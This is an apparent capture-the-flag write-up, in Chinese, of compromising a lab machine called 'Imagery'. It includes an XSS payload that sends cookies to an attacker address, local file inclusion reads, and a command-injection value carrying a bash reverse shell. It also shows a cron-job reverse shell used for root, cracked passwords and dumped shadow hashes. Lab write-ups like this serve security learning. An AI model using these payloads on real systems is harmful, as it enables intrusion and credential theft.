基本信息

端口扫描

22和8000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.88
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-04 17:55 JST
Nmap scan report for 10.10.11.88
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 35:94:fb:70:36:1a:26:3c:a8:3c:5a:5a:e4:fb:8c:18 (ECDSA)
|_  256 c2:52:7c:42:61:ce:97:9d:12:d5:01:1c:ba:68:0f:fa (ED25519)
8000/tcp open  http    Werkzeug httpd 3.1.3 (Python 3.12.7)
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7
|_http-title: Image Gallery
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.88 seconds

8000

一个图像处理相关的:

Imagery

随意注册登录,就一个上传图片功能:

Report Bug & XSS

存在交互的地方就Report Bug功能,提交信息会有bot自动查看,常规XSS,得到一个cookie:

1
2
3
<img src=1 onerror="document.location='http://10.10.14.15:7777/'+document.cookie">

session=.eJw9jbEOgzAMRP_Fc4UEZcpER74iMolLLSUGxc6AEP-Ooqod793T3QmRdU94zBEcYL8M4RlHeADrK2YWcFYqteg571R0EzSW1RupVaUC7o1Jv8aPeQxhq2L_rkHBTO2irU6ccaVydB9b4LoBKrMv2w.aODceA.M945rHcGvPXTzQMPw81g07EmRxA

Admin Panel & LFI

替换cookie后,我们可以访问到Admin Panel:

admin有一个查看日志的功能,常规LFI:

后面就是一步步读文件,最终在db.json里得到密码hash,可以解出来testuser用户密码:

1
2
3
4
5
6
7
8
9
10
11
/proc/self/cmdline
/proc/self/cwd/app.py
/proc/self/cwd/config.py
/proc/self/cwd/db.json

admin@imagery.htb
5d9c1d507a3f76af1e5c97a3ad1eaa31

testuser@imagery.htb
2c65c8d7bfbca32a3ed42596192384f6
iambatman

testuser & 命令注入

登录testuser可以发现对图片有修改size选项,结合前面LFI读取对应代码发现命令注入,直接参数拼接到command里:

所以就是通过命令注入获取shell:

1
"height":"1920; bash -c \"bash -i >& /dev/tcp/10.10.14.15/4444 0>&1\" #"

backup

在/var/backup里可以看到一个加密的备份web_20250806_120723.zip.aes,下载到本地:

1
2
$ file web_20250806_120723.zip.aes
web_20250806_120723.zip.aes: AES encrypted data, version 2, created by "pyAesCrypt 6.1.1"

可以知道是pyAesCrypt加密的,所以针对性破解:

  • GitHub - marcobellaccini/pyAesCrypt: A Python 3 module and script that uses AES256-CBC to encrypt/decrypt files and streams in AES Crypt file format (version 2).
    https://github.com/marcobellaccini/pyAesCrypt
  • GitHub - Nabeelcn25/dpyAesCrypt.py: dAescrypt.py is a multithreaded brute-force tool to crack .aes files encrypted using the pyAesCrypt library. It supports password length filtering, progress display with ETA, and optional decryption after cracking.
    https://github.com/Nabeelcn25/dpyAesCrypt.py
1
2
3
4
# 破解出密码,解密
python3 dpyAesCrypt.py ../web_20250806_120723.zip.aes ~/Tools/dict/rockyou.txt -t 100

[✅] Password found: bestfriends

db.json

解压得到的文件中也有db.json,其中得到新的用户及hash,解出对应密码:

1
2
3
4
5
6
mark@imagery.htb
01c3d2e5bdaf6134cec0a367cf53e535
supersmash

web@imagery.htb
84e3c804cf1fa14306f26f9f3da177e0

user flag

得到的mark不能直接ssh登录,从web shell切过去:

提权信息

可以sudo运行charcol,测试发现shell功能需要密码,但可以直接重置密码:

之后在shell里查看help信息,直到命令格式及功能,可以添加计划任务:

提权 & root flag

所以就是添加一个计划任务执行命令:

1
auto add --schedule "* * * * *" --command "bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'" --name "miao"

等待触发即可:

shadow

1
2
3
root:$y$j9T$OVSThp/6ybogilellugDf.$Le2uXxNfrXRiH18puL.GI7fnu2hYxttVASa.OMFvjs4:20286:0:99999:7:::
web:$y$j9T$bSJcB7IM6SVHob8SVJQ2X/$L16rTrWlInaJ6EvPTXO3CTiUP88xtNClzOJkwXIIL0D:20303:0:99999:7:::
mark:$y$j9T$m1reIJvzn7/7hhJ26v8WV1$3zPWU7HPsUn0P133BsMZDar.XmDq1T3AbJrfi.Nc6x3:20350:0:99999:7:::

参考资料

  • GitHub - marcobellaccini/pyAesCrypt: A Python 3 module and script that uses AES256-CBC to encrypt/decrypt files and streams in AES Crypt file format (version 2).
    https://github.com/marcobellaccini/pyAesCrypt
  • GitHub - Nabeelcn25/dpyAesCrypt.py: dAescrypt.py is a multithreaded brute-force tool to crack .aes files encrypted using the pyAesCrypt library. It supports password length filtering, progress display with ETA, and optional decryption after cracking.
    https://github.com/Nabeelcn25/dpyAesCrypt.py